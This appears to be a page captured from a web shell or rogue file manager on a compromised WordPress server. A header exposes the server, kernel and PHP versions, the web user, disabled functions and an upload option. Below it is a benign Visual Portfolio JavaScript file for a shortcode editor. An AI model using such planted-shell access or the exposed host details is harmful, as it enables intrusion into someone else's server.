HEX
Server: nginx/1.18.0
System: Linux mail.dakarash.co.id 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
User: www-data (33)
PHP: 8.1.2-1ubuntu2.23
Disabled: NONE
Upload Files
File: /home/dakarash.co.id/public_html/wp-content/plugins/visual-portfolio/assets/admin/js/vc-frontend.js
import $ from 'jquery';

const { vc } = window;

$(() => {
	// shortcode frontend editor
	if (typeof vc !== 'undefined') {
		// on shortcode add and update events
		vc.events.on('shortcodes:add shortcodeView:updated', (e) => {
			if (e.settings.base !== 'visual_portfolio') {
				return;
			}

			const wnd = vc.$frame[0].contentWindow;
			const jQframe = wnd ? wnd.jQuery : false;

			if (jQframe) {
				const $vp = jQframe(e.view.el).children('.vp-portfolio');
				if ($vp.length && typeof $vp.vpf !== 'undefined') {
					$vp.vpf();
				}
			}
		});
	}
});